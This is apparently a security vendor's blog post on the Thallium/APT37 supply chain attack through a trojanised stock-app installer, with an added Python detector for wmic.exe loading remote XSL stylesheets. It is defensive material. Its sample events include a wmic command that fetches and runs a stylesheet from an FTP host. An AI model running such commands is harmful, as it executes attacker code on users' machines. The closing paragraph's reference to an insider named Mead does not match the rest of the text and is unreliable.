Thallium, the chemical element with atomic number 81, is a soft, silvery-white metal and is highly poisonous.

The North Korean threat actor group APT37 is also known as Thallium. This threat group carried out a software supply chain attack against a private stock investment messenger service.

Their tactics and techniques consisted of a series of phishing attacks that used Microsoft Office documents to lure victims. Thallium also distributed infected Windows installers and macro-laden Office documents.

They did this by producing a Windows executable, built with the Nullsoft Scriptable Install System (NSIS), that was infused with malicious code. It contained not only the malicious code but also the genuine files of the stock investment application, so the installer appeared legitimate.

Within the otherwise genuine installer, the threat actors embedded commands that retrieved a malicious XSL script from a rogue FTP server and executed it on Windows systems through the built-in wmic.exe utility.
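The behaviour described above, a trusted installer spawning wmic.exe to load a stylesheet from a remote server, is something defenders can hunt for in process-creation telemetry. The following detection logic is an added example written for this post and is not code from the original article, from SpearTip, or from any vendor product. It assumes process-creation events have already been normalised into dictionaries with `parent`, `image` and `cmdline` keys; the sample events, the FTP address (a documentation-range IP) and the list of built-in wmic format names are constructed assumptions for illustration.

```python
import re
from urllib.parse import urlparse

# Constructed sample process-creation events (not taken from the page or any real incident).
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files\StockApp\setup.exe",
     "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": r'wmic os get /format:"ftp://203.0.113.10/update.xsl"'},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": "wmic os get caption /format:list"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": r"wmic process list /format:C:\Users\Public\view.xsl"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd /c dir"},
]

# Captures the value of a /format: switch, with or without surrounding quotes.
FORMAT_RE = re.compile(r'/format:\s*"?([^"\s]+)"?', re.IGNORECASE)
REMOTE_SCHEMES = ("http", "https", "ftp")
# Assumed starting set of built-in wmic output formats; these resolve to stylesheets
# shipped with Windows and are benign on their own. Tune for your environment.
BUILTIN_FORMATS = {"list", "csv", "table", "xml", "htable", "hform",
                   "mof", "rawxml", "value", "textvaluelist"}


def classify_wmic(cmdline):
    """Return a reason string if the wmic command line loads an XSL from a
    suspicious source, or None when the /format value is benign or absent."""
    match = FORMAT_RE.search(cmdline)
    if not match:
        return None
    target = match.group(1)
    if target.lower() in BUILTIN_FORMATS:
        return None
    parsed = urlparse(target)
    if parsed.scheme.lower() in REMOTE_SCHEMES:
        # Stylesheet fetched over the network, as in the installer described above.
        return f"remote XSL via {parsed.scheme.lower()}://{parsed.netloc}"
    if target.startswith("\\\\"):
        return "XSL from UNC path"
    if target.lower().endswith(".xsl"):
        return "custom local XSL file"
    return "non-builtin /format target"


def detect(events):
    """Scan normalised process-creation events and return (parent, reason) pairs
    for every wmic.exe launch that loads a stylesheet from a suspicious source."""
    hits = []
    for event in events:
        if not event["image"].lower().endswith("wmic.exe"):
            continue
        reason = classify_wmic(event["cmdline"])
        if reason:
            hits.append((event["parent"], reason))
    return hits


if __name__ == "__main__":
    for parent, reason in detect(SAMPLE_EVENTS):
        print(f"ALERT: {reason} (spawned by {parent})")
```

In a real deployment the parent image is the more interesting field: wmic.exe spawned by a third-party setup executable, as in the first constructed event, deserves far more scrutiny than the same command typed at an administrator's console, so the parent process is worth feeding into the alert's severity.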

Another supply chain attack is cause for concern, given what happened recently in the SolarWinds breach. The chain of trusted connections leading to specific victims opens up many avenues for threat actors to infiltrate.

Read more technical details on Thallium here.

When organizations partner with a cybersecurity company like SpearTip, logs are monitored 24/7/365. Threats come in many forms, one of them being former employees, or insiders. SpearTip's ShadowSpear® Platform has been proven to prevent advanced malware as well. Not only does ShadowSpear® prevent malicious encryption, it would also have detected and prevented the activity that allowed Mead full access to the environment. Our professional, certified cybersecurity engineers protect environments and deploy our proprietary tool, ShadowSpear®, when an environment is under attack.